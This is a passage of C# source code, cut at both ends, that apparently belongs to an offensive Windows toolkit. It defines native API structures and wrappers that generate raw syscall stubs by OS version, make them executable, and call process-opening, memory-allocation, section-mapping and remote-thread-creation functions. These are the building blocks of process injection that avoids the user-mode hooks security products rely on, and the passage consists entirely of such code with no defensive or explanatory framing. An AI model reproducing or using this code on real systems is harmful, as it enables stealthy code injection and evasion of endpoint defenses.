ThreadIsTerminating = 0xc000004b, 146 | BadWorkingSetLimit = 0xc000004c, 147 | IncompatibleFileMap = 0xc000004d, 148 | SectionProtection = 0xc000004e, 149 | EasNotSupported = 0xc000004f, 150 | EaTooLarge = 0xc0000050, 151 | NonExistentEaEntry = 0xc0000051, 152 | NoEasOnFile = 0xc0000052, 153 | EaCorruptError = 0xc0000053, 154 | FileLockConflict = 0xc0000054, 155 | LockNotGranted = 0xc0000055, 156 | DeletePending = 0xc0000056, 157 | CtlFileNotSupported = 0xc0000057, 158 | UnknownRevision = 0xc0000058, 159 | RevisionMismatch = 0xc0000059, 160 | InvalidOwner = 0xc000005a, 161 | InvalidPrimaryGroup = 0xc000005b, 162 | NoImpersonationToken = 0xc000005c, 163 | CantDisableMandatory = 0xc000005d, 164 | NoLogonServers = 0xc000005e, 165 | NoSuchLogonSession = 0xc000005f, 166 | NoSuchPrivilege = 0xc0000060, 167 | PrivilegeNotHeld = 0xc0000061, 168 | InvalidAccountName = 0xc0000062, 169 | UserExists = 0xc0000063, 170 | NoSuchUser = 0xc0000064, 171 | GroupExists = 0xc0000065, 172 | NoSuchGroup = 0xc0000066, 173 | MemberInGroup = 0xc0000067, 174 | MemberNotInGroup = 0xc0000068, 175 | LastAdmin = 0xc0000069, 176 | WrongPassword = 0xc000006a, 177 | IllFormedPassword = 0xc000006b, 178 | PasswordRestriction = 0xc000006c, 179 | LogonFailure = 0xc000006d, 180 | AccountRestriction = 0xc000006e, 181 | InvalidLogonHours = 0xc000006f, 182 | InvalidWorkstation = 0xc0000070, 183 | PasswordExpired = 0xc0000071, 184 | AccountDisabled = 0xc0000072, 185 | NoneMapped = 0xc0000073, 186 | TooManyLuidsRequested = 0xc0000074, 187 | LuidsExhausted = 0xc0000075, 188 | InvalidSubAuthority = 0xc0000076, 189 | InvalidAcl = 0xc0000077, 190 | InvalidSid = 0xc0000078, 191 | InvalidSecurityDescr = 0xc0000079, 192 | ProcedureNotFound = 0xc000007a, 193 | InvalidImageFormat = 0xc000007b, 194 | NoToken = 0xc000007c, 195 | BadInheritanceAcl = 0xc000007d, 196 | RangeNotLocked = 0xc000007e, 197 | DiskFull = 0xc000007f, 198 | ServerDisabled = 0xc0000080, 199 | ServerNotDisabled = 0xc0000081, 200 | TooManyGuidsRequested = 0xc0000082, 201 | GuidsExhausted = 0xc0000083, 202 | InvalidIdAuthority = 0xc0000084, 203 | AgentsExhausted = 0xc0000085, 204 | InvalidVolumeLabel = 0xc0000086, 205 | SectionNotExtended = 0xc0000087, 206 | NotMappedData = 0xc0000088, 207 | ResourceDataNotFound = 0xc0000089, 208 | ResourceTypeNotFound = 0xc000008a, 209 | ResourceNameNotFound = 0xc000008b, 210 | ArrayBoundsExceeded = 0xc000008c, 211 | FloatDenormalOperand = 0xc000008d, 212 | FloatDivideByZero = 0xc000008e, 213 | FloatInexactResult = 0xc000008f, 214 | FloatInvalidOperation = 0xc0000090, 215 | FloatOverflow = 0xc0000091, 216 | FloatStackCheck = 0xc0000092, 217 | FloatUnderflow = 0xc0000093, 218 | IntegerDivideByZero = 0xc0000094, 219 | IntegerOverflow = 0xc0000095, 220 | PrivilegedInstruction = 0xc0000096, 221 | TooManyPagingFiles = 0xc0000097, 222 | FileInvalid = 0xc0000098, 223 | InstanceNotAvailable = 0xc00000ab, 224 | PipeNotAvailable = 0xc00000ac, 225 | InvalidPipeState = 0xc00000ad, 226 | PipeBusy = 0xc00000ae, 227 | IllegalFunction = 0xc00000af, 228 | PipeDisconnected = 0xc00000b0, 229 | PipeClosing = 0xc00000b1, 230 | PipeConnected = 0xc00000b2, 231 | PipeListening = 0xc00000b3, 232 | InvalidReadMode = 0xc00000b4, 233 | IoTimeout = 0xc00000b5, 234 | FileForcedClosed = 0xc00000b6, 235 | ProfilingNotStarted = 0xc00000b7, 236 | ProfilingNotStopped = 0xc00000b8, 237 | NotSameDevice = 0xc00000d4, 238 | FileRenamed = 0xc00000d5, 239 | CantWait = 0xc00000d8, 240 | PipeEmpty = 0xc00000d9, 241 | CantTerminateSelf = 0xc00000db, 242 | InternalError = 0xc00000e5, 243 | InvalidParameter1 = 0xc00000ef, 244 | InvalidParameter2 = 0xc00000f0, 245 | InvalidParameter3 = 0xc00000f1, 246 | InvalidParameter4 = 0xc00000f2, 247 | InvalidParameter5 = 0xc00000f3, 248 | InvalidParameter6 = 0xc00000f4, 249 | InvalidParameter7 = 0xc00000f5, 250 | InvalidParameter8 = 0xc00000f6, 251 | InvalidParameter9 = 0xc00000f7, 252 | InvalidParameter10 = 0xc00000f8, 253 | InvalidParameter11 = 0xc00000f9, 254 | InvalidParameter12 = 0xc00000fa, 255 | MappedFileSizeZero = 0xc000011e, 256 | TooManyOpenedFiles = 0xc000011f, 257 | Cancelled = 0xc0000120, 258 | CannotDelete = 0xc0000121, 259 | InvalidComputerName = 0xc0000122, 260 | FileDeleted = 0xc0000123, 261 | SpecialAccount = 0xc0000124, 262 | SpecialGroup = 0xc0000125, 263 | SpecialUser = 0xc0000126, 264 | MembersPrimaryGroup = 0xc0000127, 265 | FileClosed = 0xc0000128, 266 | TooManyThreads = 0xc0000129, 267 | ThreadNotInProcess = 0xc000012a, 268 | TokenAlreadyInUse = 0xc000012b, 269 | PagefileQuotaExceeded = 0xc000012c, 270 | CommitmentLimit = 0xc000012d, 271 | InvalidImageLeFormat = 0xc000012e, 272 | InvalidImageNotMz = 0xc000012f, 273 | InvalidImageProtect = 0xc0000130, 274 | InvalidImageWin16 = 0xc0000131, 275 | LogonServer = 0xc0000132, 276 | DifferenceAtDc = 0xc0000133, 277 | SynchronizationRequired = 0xc0000134, 278 | DllNotFound = 0xc0000135, 279 | IoPrivilegeFailed = 0xc0000137, 280 | OrdinalNotFound = 0xc0000138, 281 | EntryPointNotFound = 0xc0000139, 282 | ControlCExit = 0xc000013a, 283 | PortNotSet = 0xc0000353, 284 | DebuggerInactive = 0xc0000354, 285 | CallbackBypass = 0xc0000503, 286 | PortClosed = 0xc0000700, 287 | MessageLost = 0xc0000701, 288 | InvalidMessage = 0xc0000702, 289 | RequestCanceled = 0xc0000703, 290 | RecursiveDispatch = 0xc0000704, 291 | LpcReceiveBufferExpected = 0xc0000705, 292 | LpcInvalidConnectionUsage = 0xc0000706, 293 | LpcRequestsNotAllowed = 0xc0000707, 294 | ResourceInUse = 0xc0000708, 295 | ProcessIsProtected = 0xc0000712, 296 | VolumeDirty = 0xc0000806, 297 | FileCheckedOut = 0xc0000901, 298 | CheckOutRequired = 0xc0000902, 299 | BadFileType = 0xc0000903, 300 | FileTooLarge = 0xc0000904, 301 | FormsAuthRequired = 0xc0000905, 302 | VirusInfected = 0xc0000906, 303 | VirusDeleted = 0xc0000907, 304 | TransactionalConflict = 0xc0190001, 305 | InvalidTransaction = 0xc0190002, 306 | TransactionNotActive = 0xc0190003, 307 | TmInitializationFailed = 0xc0190004, 308 | RmNotActive = 0xc0190005, 309 | RmMetadataCorrupt = 0xc0190006, 310 | TransactionNotJoined = 0xc0190007, 311 | DirectoryNotRm = 0xc0190008, 312 | CouldNotResizeLog = 0xc0190009, 313 | TransactionsUnsupportedRemote = 0xc019000a, 314 | LogResizeInvalidSize = 0xc019000b, 315 | RemoteFileVersionMismatch = 0xc019000c, 316 | CrmProtocolAlreadyExists = 0xc019000f, 317 | TransactionPropagationFailed = 0xc0190010, 318 | CrmProtocolNotFound = 0xc0190011, 319 | TransactionSuperiorExists = 0xc0190012, 320 | TransactionRequestNotValid = 0xc0190013, 321 | TransactionNotRequested = 0xc0190014, 322 | TransactionAlreadyAborted = 0xc0190015, 323 | TransactionAlreadyCommitted = 0xc0190016, 324 | TransactionInvalidMarshallBuffer = 0xc0190017, 325 | CurrentTransactionNotValid = 0xc0190018, 326 | LogGrowthFailed = 0xc0190019, 327 | ObjectNoLongerExists = 0xc0190021, 328 | StreamMiniversionNotFound = 0xc0190022, 329 | StreamMiniversionNotValid = 0xc0190023, 330 | MiniversionInaccessibleFromSpecifiedTransaction = 0xc0190024, 331 | CantOpenMiniversionWithModifyIntent = 0xc0190025, 332 | CantCreateMoreStreamMiniversions = 0xc0190026, 333 | HandleNoLongerValid = 0xc0190028, 334 | NoTxfMetadata = 0xc0190029, 335 | LogCorruptionDetected = 0xc0190030, 336 | CantRecoverWithHandleOpen = 0xc0190031, 337 | RmDisconnected = 0xc0190032, 338 | EnlistmentNotSuperior = 0xc0190033, 339 | RecoveryNotNeeded = 0xc0190034, 340 | RmAlreadyStarted = 0xc0190035, 341 | FileIdentityNotPersistent = 0xc0190036, 342 | CantBreakTransactionalDependency = 0xc0190037, 343 | CantCrossRmBoundary = 0xc0190038, 344 | TxfDirNotEmpty = 0xc0190039, 345 | IndoubtTransactionsExist = 0xc019003a, 346 | TmVolatile = 0xc019003b, 347 | RollbackTimerExpired = 0xc019003c, 348 | TxfAttributeCorrupt = 0xc019003d, 349 | EfsNotAllowedInTransaction = 0xc019003e, 350 | TransactionalOpenNotAllowed = 0xc019003f, 351 | TransactedMappingUnsupportedRemote = 0xc0190040, 352 | TxfMetadataAlreadyPresent = 0xc0190041, 353 | TransactionScopeCallbacksNotSet = 0xc0190042, 354 | TransactionRequiredPromotion = 0xc0190043, 355 | CannotExecuteFileInTransaction = 0xc0190044, 356 | TransactionsNotFrozen = 0xc0190045, 357 | MaximumNtStatus = 0xffffffff 358 | }; 359 | 360 | 361 | public enum THREAD_INFORMATION_CLASS { 362 | ThreadBasicInformation, 363 | ThreadTimes, 364 | ThreadPriority, 365 | ThreadBasePriority, 366 | ThreadAffinityMask, 367 | ThreadImpersonationToken, 368 | ThreadDescriptorTableEntry, 369 | ThreadEnableAlignmentFaultFixup, 370 | ThreadEventPair, 371 | ThreadQuerySetWin32StartAddress, 372 | ThreadZeroTlsCell, 373 | ThreadPerformanceCount, 374 | ThreadAmILastThread, 375 | ThreadIdealProcessor, 376 | ThreadPriorityBoost, 377 | ThreadSetTlsArrayAddress, 378 | ThreadIsIoPending, 379 | ThreadHideFromDebugger, 380 | ThreadBreakOnTermination, 381 | ThreadSwitchLegacyState, 382 | ThreadIsTerminated, 383 | ThreadLastSystemCall, 384 | ThreadIoPriority, 385 | ThreadCycleTime, 386 | ThreadPagePriority, 387 | ThreadActualBasePriority, 388 | ThreadTebInformation, 389 | ThreadCSwitchMon, 390 | MaxThreadInfoClass 391 | } 392 | 393 | 394 | [StructLayout(LayoutKind.Sequential)] 395 | public struct THREAD_BASIC_INFORMATION { 396 | public int ExitStatus; 397 | public int TebBaseAddress; 398 | public CLIENT_ID ClientId; 399 | public int AffinityMask; 400 | public int Priority; 401 | public int BasePriority; 402 | } 403 | 404 | public enum ProcessAccessFlags : uint 405 | { 406 | Terminate = 0x00000001, 407 | CreateThread = 0x00000002, 408 | VMOperation = 0x00000008, 409 | VMRead = 0x00000010, 410 | VMWrite = 0x00000020, 411 | DupHandle = 0x00000040, 412 | SetInformation = 0x00000200, 413 | QueryInformation = 0x00000400, 414 | Synchronize = 0x00100000, 415 | All = 0x001F0FFF 416 | } 417 | 418 | [StructLayout(LayoutKind.Sequential)] 419 | public struct OBJECT_ATTRIBUTES 420 | { 421 | public ulong Length; 422 | public IntPtr RootDirectory; 423 | public IntPtr ObjectName; 424 | public ulong Attributes; 425 | public IntPtr SecurityDescriptor; 426 | public IntPtr SecurityQualityOfService; 427 | } 428 | 429 | [StructLayout(LayoutKind.Sequential)] 430 | public struct SECTION_DATA 431 | { 432 | public Boolean isvalid; 433 | public IntPtr SectionHandle; 434 | public IntPtr pBase; 435 | } 436 | 437 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 438 | public struct OSVERSIONINFOEXW 439 | { 440 | public int dwOSVersionInfoSize; 441 | public int dwMajorVersion; 442 | public int dwMinorVersion; 443 | public int dwBuildNumber; 444 | public int dwPlatformId; 445 | [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 128)] 446 | public string szCSDVersion; 447 | public UInt16 wServicePackMajor; 448 | public UInt16 wServicePackMinor; 449 | public UInt16 wSuiteMask; 450 | public byte wProductType; 451 | public byte wReserved; 452 | } 453 | 454 | 455 | [Flags] 456 | public enum ACCESS_MASK : uint 457 | { 458 | DELETE = 0x00010000, 459 | READ_CONTROL = 0x00020000, 460 | WRITE_DAC = 0x00040000, 461 | WRITE_OWNER = 0x00080000, 462 | SYNCHRONIZE = 0x00100000, 463 | STANDARD_RIGHTS_REQUIRED = 0x000F0000, 464 | STANDARD_RIGHTS_READ = 0x00020000, 465 | STANDARD_RIGHTS_WRITE = 0x00020000, 466 | STANDARD_RIGHTS_EXECUTE = 0x00020000, 467 | STANDARD_RIGHTS_ALL = 0x001F0000, 468 | SPECIFIC_RIGHTS_ALL = 0x0000FFFF, 469 | ACCESS_SYSTEM_SECURITY = 0x01000000, 470 | MAXIMUM_ALLOWED = 0x02000000, 471 | GENERIC_READ = 0x80000000, 472 | GENERIC_WRITE = 0x40000000, 473 | GENERIC_EXECUTE = 0x20000000, 474 | GENERIC_ALL = 0x10000000, 475 | DESKTOP_READOBJECTS = 0x00000001, 476 | DESKTOP_CREATEWINDOW = 0x00000002, 477 | DESKTOP_CREATEMENU = 0x00000004, 478 | DESKTOP_HOOKCONTROL = 0x00000008, 479 | DESKTOP_JOURNALRECORD = 0x00000010, 480 | DESKTOP_JOURNALPLAYBACK = 0x00000020, 481 | DESKTOP_ENUMERATE = 0x00000040, 482 | DESKTOP_WRITEOBJECTS = 0x00000080, 483 | DESKTOP_SWITCHDESKTOP = 0x00000100, 484 | WINSTA_ENUMDESKTOPS = 0x00000001, 485 | WINSTA_READATTRIBUTES = 0x00000002, 486 | WINSTA_ACCESSCLIPBOARD = 0x00000004, 487 | WINSTA_CREATEDESKTOP = 0x00000008, 488 | WINSTA_WRITEATTRIBUTES = 0x00000010, 489 | WINSTA_ACCESSGLOBALATOMS = 0x00000020, 490 | WINSTA_EXITWINDOWS = 0x00000040, 491 | WINSTA_ENUMERATE = 0x00000100, 492 | WINSTA_READSCREEN = 0x00000200, 493 | WINSTA_ALL_ACCESS = 0x0000037F 494 | } 495 | 496 | [StructLayout(LayoutKind.Sequential)] 497 | public struct CLIENT_ID 498 | { 499 | public IntPtr UniqueProcess; 500 | public IntPtr UniqueThread; 501 | } 502 | 503 | [SuppressUnmanagedCodeSecurity] 504 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 505 | public delegate NTSTATUS ProtectorX(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr RegionSize, UInt32 NewProtect, ref UInt32 OldProtect ); 506 | public static NTSTATUS Protector(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr RegionSize, UInt32 NewProtect, ref UInt32 OldProtect) 507 | { 508 | IntPtr proc = GetLibraryAddress(@"C:\Windows\System32\ntdll.dll", "ZwProtectVirtualMemory", false); 509 | ProtectorX ProtectorFunc = (ProtectorX)Marshal.GetDelegateForFunctionPointer(proc, typeof(ProtectorX)); 510 | return (NTSTATUS)ProtectorFunc( ProcessHandle, ref BaseAddress, ref RegionSize, NewProtect, ref OldProtect ); 511 | } 512 | 513 | [SuppressUnmanagedCodeSecurity] 514 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 515 | public delegate NTSTATUS RtlCreateUserThreadX( IntPtr hProcess, uint lpThreadSecurity, bool bCreateSuspended, uint dwStackZeroBits, IntPtr pStackReserved, IntPtr pStackCommit, IntPtr pStartAddress, IntPtr pStartParameter, out IntPtr hThread, out CLIENT_ID pClientId ); 516 | public static NTSTATUS RtlCreateUserThread( IntPtr hProcess, uint lpThreadSecurity, bool bCreateSuspended, uint dwStackZeroBits, IntPtr pStackReserved, IntPtr pStackCommit, IntPtr pStartAddress, IntPtr pStartParameter, out IntPtr hThread, out CLIENT_ID pClientId ) 517 | { 518 | IntPtr proc = GetLibraryAddress(@"C:\Windows\System32\ntdll.dll", "RtlCreateUserThread", false); 519 | RtlCreateUserThreadX RtlCreateUserThreadXFunc = (RtlCreateUserThreadX)Marshal.GetDelegateForFunctionPointer(proc, typeof(RtlCreateUserThreadX)); 520 | return (NTSTATUS)RtlCreateUserThreadXFunc( hProcess, lpThreadSecurity, bCreateSuspended, dwStackZeroBits, pStackReserved, pStackCommit, pStartAddress, pStartParameter, out hThread, out pClientId ); 521 | } 522 | 523 | 524 | [SuppressUnmanagedCodeSecurity] 525 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 526 | public delegate NTSTATUS ZwProtectVirtualMemoryX(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr NumberOfBytesToProtect, UInt32 NewAccessProtection, ref UInt32 lpNumberOfBytesWritten); 527 | public static NTSTATUS ZwProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr NumberOfBytesToProtect, UInt32 NewAccessProtection, ref UInt32 lpNumberOfBytesWritten, ref OSVERSIONINFOEXW osVersionInfo) 528 | { 529 | byte [] syscall = GetOSVersionAndReturnSyscall( 16, ref osVersionInfo ); 530 | unsafe 531 | { 532 | fixed (byte* ptr = syscall) 533 | { 534 | IntPtr allocMemAddress = (IntPtr)ptr; 535 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 536 | UInt32 size = (uint)syscall.Length; 537 | IntPtr sizeIntPtr = (IntPtr)size; 538 | UInt32 oldprotect = 0; 539 | Protector( new IntPtr(-1), ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect); 540 | ZwProtectVirtualMemoryX ZwProtectVirtualMemoryFunc = (ZwProtectVirtualMemoryX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwProtectVirtualMemoryX)); 541 | return (NTSTATUS)ZwProtectVirtualMemoryFunc( ProcessHandle, ref BaseAddress, ref NumberOfBytesToProtect, NewAccessProtection, ref lpNumberOfBytesWritten); 542 | } 543 | } 544 | } 545 | 546 | [SuppressUnmanagedCodeSecurity] 547 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 548 | public delegate NTSTATUS ZwCreateSectionX( ref IntPtr section, UInt32 desiredAccess, IntPtr pAttrs, ref long MaximumSize, uint pageProt, uint allocationAttribs, IntPtr hFile ); 549 | public static NTSTATUS ZwCreateSection( ref IntPtr section, UInt32 desiredAccess, IntPtr pAttrs, ref long MaximumSize, uint pageProt, uint allocationAttribs, IntPtr hFile, ref OSVERSIONINFOEXW osVersionInfo ) 550 | { 551 | byte [] syscall = GetOSVersionAndReturnSyscall( 5, ref osVersionInfo ); 552 | unsafe 553 | { 554 | fixed (byte* ptr = syscall) 555 | { 556 | IntPtr allocMemAddress = (IntPtr)ptr; 557 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 558 | UInt32 size = (uint)syscall.Length; 559 | IntPtr sizeIntPtr = (IntPtr)size; 560 | UInt32 oldprotect = 0; 561 | ZwProtectVirtualMemory( new IntPtr(-1), ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo); 562 | ZwCreateSectionX ZwCreateSectionFunc = (ZwCreateSectionX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwCreateSectionX)); 563 | return (NTSTATUS)ZwCreateSectionFunc( ref section, desiredAccess, pAttrs, ref MaximumSize, pageProt, allocationAttribs, hFile ); 564 | } 565 | 566 | } 567 | } 568 | 569 | [SuppressUnmanagedCodeSecurity] 570 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 571 | public delegate NTSTATUS ZwMapViewOfSectionX( IntPtr SectionHandle, IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, IntPtr CommitSize, ref long SectionOffset, ref long ViewSize, uint InheritDisposition, uint AllocationType, uint Win32Protect ); 572 | public static NTSTATUS ZwMapViewOfSection( IntPtr SectionHandle, IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, IntPtr CommitSize, ref long SectionOffset, ref long ViewSize, uint InheritDisposition, uint AllocationType, uint Win32Protect, ref OSVERSIONINFOEXW osVersionInfo) 573 | { 574 | byte [] syscall = GetOSVersionAndReturnSyscall( 6, ref osVersionInfo ); 575 | unsafe 576 | { 577 | fixed (byte* ptr = syscall) 578 | { 579 | IntPtr allocMemAddress = (IntPtr)ptr; 580 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 581 | UInt32 size = (uint)syscall.Length; 582 | IntPtr sizeIntPtr = (IntPtr)size; 583 | UInt32 oldprotect = 0; 584 | ZwProtectVirtualMemory( ProcessHandle, ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo); 585 | ZwMapViewOfSectionX ZwMapViewOfSectionFunc = (ZwMapViewOfSectionX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwMapViewOfSectionX)); 586 | return (NTSTATUS)ZwMapViewOfSectionFunc( SectionHandle, ProcessHandle, ref BaseAddress, ZeroBits, CommitSize, ref SectionOffset, ref ViewSize, InheritDisposition, AllocationType, Win32Protect ); 587 | } 588 | 589 | } 590 | } 591 | 592 | [SuppressUnmanagedCodeSecurity] 593 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 594 | public delegate NTSTATUS ZwOpenProcessX(out IntPtr ProcessHandle, ProcessAccessFlags processAccess, OBJECT_ATTRIBUTES objAttribute, ref CLIENT_ID clientid); 595 | public static NTSTATUS ZwOpenProcess(out IntPtr ProcessHandle, ProcessAccessFlags processAccess, OBJECT_ATTRIBUTES objAttribute, ref CLIENT_ID clientid, ref OSVERSIONINFOEXW osVersionInfo) 596 | { 597 | byte [] syscall = GetOSVersionAndReturnSyscall( 1, ref osVersionInfo ); 598 | unsafe 599 | { 600 | fixed (byte* ptr = syscall) 601 | { 602 | IntPtr allocMemAddress = (IntPtr)ptr; 603 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 604 | UInt32 size = (uint)syscall.Length; 605 | IntPtr sizeIntPtr = (IntPtr)size; 606 | UInt32 oldprotect = 0; 607 | ZwProtectVirtualMemory( new IntPtr(-1), ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo); 608 | ZwOpenProcessX ZwOpenProcessFunc = (ZwOpenProcessX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwOpenProcessX)); 609 | return (NTSTATUS)ZwOpenProcessFunc(out ProcessHandle, processAccess, objAttribute, ref clientid); 610 | } 611 | 612 | } 613 | } 614 | 615 | [SuppressUnmanagedCodeSecurity] 616 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 617 | public delegate NTSTATUS NtCreateThreadExX(out IntPtr threadHandle,uint desiredAccess,IntPtr objectAttributes,IntPtr processHandle,IntPtr lpStartAddress,IntPtr lpParameter,int createSuspended,uint stackZeroBits,uint sizeOfStackCommit,uint sizeOfStackReserve,IntPtr lpBytesBuffer); 618 | public static NTSTATUS ZwCreateThreadEx(out IntPtr threadHandle, uint desiredAccess, IntPtr objectAttributes, IntPtr processHandle, IntPtr lpStartAddress, IntPtr lpParameter, int createSuspended, uint stackZeroBits, uint sizeOfStackCommit, uint sizeOfStackReserve, IntPtr lpBytesBuffer, ref OSVERSIONINFOEXW osVersionInfo) 619 | { 620 | byte [] syscall = GetOSVersionAndReturnSyscall( 2, ref osVersionInfo ); 621 | unsafe 622 | { 623 | fixed (byte* ptr = syscall) 624 | { 625 | IntPtr allocMemAddress = (IntPtr)ptr; 626 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 627 | uint size = (uint)syscall.Length; 628 | IntPtr sizeIntPtr = (IntPtr)size; 629 | UInt32 oldprotect = 0; 630 | ZwProtectVirtualMemory( new IntPtr(-1), ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo); 631 | NtCreateThreadExX NtCreateThreadExFunc = (NtCreateThreadExX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(NtCreateThreadExX)); 632 | return (NTSTATUS)NtCreateThreadExFunc(out threadHandle, desiredAccess, objectAttributes, processHandle, lpStartAddress, lpParameter, createSuspended, stackZeroBits, sizeOfStackCommit, sizeOfStackReserve, lpBytesBuffer); 633 | } 634 | } 635 | } 636 | 637 | [SuppressUnmanagedCodeSecurity] 638 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 639 | public delegate NTSTATUS ZwCloseX( IntPtr ProcessHandle ); 640 | public static NTSTATUS ZwClose( IntPtr ProcessHandle, ref OSVERSIONINFOEXW osVersionInfo ) 641 | { 642 | byte [] syscall = GetOSVersionAndReturnSyscall( 13, ref osVersionInfo ); 643 | unsafe 644 | { 645 | fixed (byte* ptr = syscall) 646 | { 647 | IntPtr allocMemAddress = (IntPtr)ptr; 648 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 649 | UInt32 size = (uint)syscall.Length; 650 | IntPtr sizeIntPtr = (IntPtr)size; 651 | UInt32 oldprotect = 0; 652 | ZwProtectVirtualMemory( new IntPtr(-1), ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo); 653 | ZwCloseX ZwCloseFunc = (ZwCloseX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwCloseX)); 654 | return (NTSTATUS)ZwCloseFunc( ProcessHandle ); 655 | } 656 | 657 | } 658 | } 659 | 660 | [SuppressUnmanagedCodeSecurity] 661 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 662 | public delegate NTSTATUS ZwCreateProcessX( out IntPtr ProcessHandle, ACCESS_MASK DesiredAccess, OBJECT_ATTRIBUTES ObjectAttributes, IntPtr InheriteFromProcessHandle, bool InheritHandles, IntPtr SectionHandle, IntPtr DebugPort, IntPtr ExceptionPort ); 663 | public static NTSTATUS ZwCreateProcess( out IntPtr ProcessHandle, ACCESS_MASK DesiredAccess, OBJECT_ATTRIBUTES ObjectAttributes, IntPtr InheriteFromProcessHandle, bool InheritHandles, IntPtr SectionHandle, IntPtr DebugPort, IntPtr ExceptionPort, ref OSVERSIONINFOEXW osVersionInfo ) 664 | { 665 | byte [] syscall = GetOSVersionAndReturnSyscall( 7, ref osVersionInfo ); 666 | unsafe 667 | { 668 | fixed (byte* ptr = syscall) 669 | { 670 | IntPtr allocMemAddress = (IntPtr)ptr; 671 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 672 | UInt32 size = (uint)syscall.Length; 673 | IntPtr sizeIntPtr = (IntPtr)size; 674 | UInt32 oldprotect = 0; 675 | ZwProtectVirtualMemory( new IntPtr(-1), ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo ); 676 | ZwCreateProcessX ZwCreateProcessXFunc = (ZwCreateProcessX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwCreateProcessX)); 677 | return (NTSTATUS)ZwCreateProcessXFunc( out ProcessHandle, DesiredAccess, ObjectAttributes, InheriteFromProcessHandle, InheritHandles, SectionHandle, DebugPort, ExceptionPort ); 678 | } 679 | 680 | } 681 | } 682 | 683 | [SuppressUnmanagedCodeSecurity] 684 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 685 | public delegate NTSTATUS ZwAllocateVirtualMemoryX( IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref IntPtr RegionSize, UInt32 AllocationType, UInt32 Protect ); 686 | public static NTSTATUS ZwAllocateVirtualMemory( IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref IntPtr RegionSize, UInt32 AllocationType, UInt32 Protect, ref OSVERSIONINFOEXW osVersionInfo) 687 | { 688 | byte [] syscall = GetOSVersionAndReturnSyscall( 4, ref osVersionInfo ); 689 | unsafe 690 | { 691 | fixed (byte* ptr = syscall) 692 | { 693 | IntPtr allocMemAddress = (IntPtr)ptr; 694 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 695 | UInt32 size = (uint)syscall.Length; 696 | IntPtr sizeIntPtr = (IntPtr)size; 697 | UInt32 oldprotect = 0; 698 | ZwProtectVirtualMemory( ProcessHandle, ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo ); 699 | ZwAllocateVirtualMemoryX ZwAllocateVirtualMemoryFunc = (ZwAllocateVirtualMemoryX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwAllocateVirtualMemoryX)); 700 | return (NTSTATUS)ZwAllocateVirtualMemoryFunc( ProcessHandle, ref BaseAddress, ZeroBits, ref RegionSize, AllocationType, Protect ); 701 | 702 | } 703 | } 704 | } 705 | 706 | [SuppressUnmanagedCodeSecurity] 707 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 708 | public delegate NTSTATUS ZwOpenProcessTokenX(IntPtr ProcessHandle, int DesiredAccess, ref IntPtr TokenHandle); 709 | public static NTSTATUS ZwOpenProcessToken(IntPtr ProcessHandle, int DesiredAccess, ref IntPtr TokenHandle, ref OSVERSIONINFOEXW osVersionInfo) 710 | { 711 | byte [] syscall = GetOSVersionAndReturnSyscall( 16, ref osVersionInfo ); 712 | unsafe 713 | { 714 | fixed (byte* ptr = syscall) 715 | { 716 | IntPtr allocMemAddress = (IntPtr)ptr; 717 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 718 | uint size = (uint)syscall.Length; 719 | IntPtr sizeIntPtr = (IntPtr)size; 720 | UInt32 oldprotect = 0; 721 | NTSTATUS status = Protector( new IntPtr(-1), ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect); 722 | ZwOpenProcessTokenX ZwOpenProcessTokenFunc = (ZwOpenProcessTokenX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, 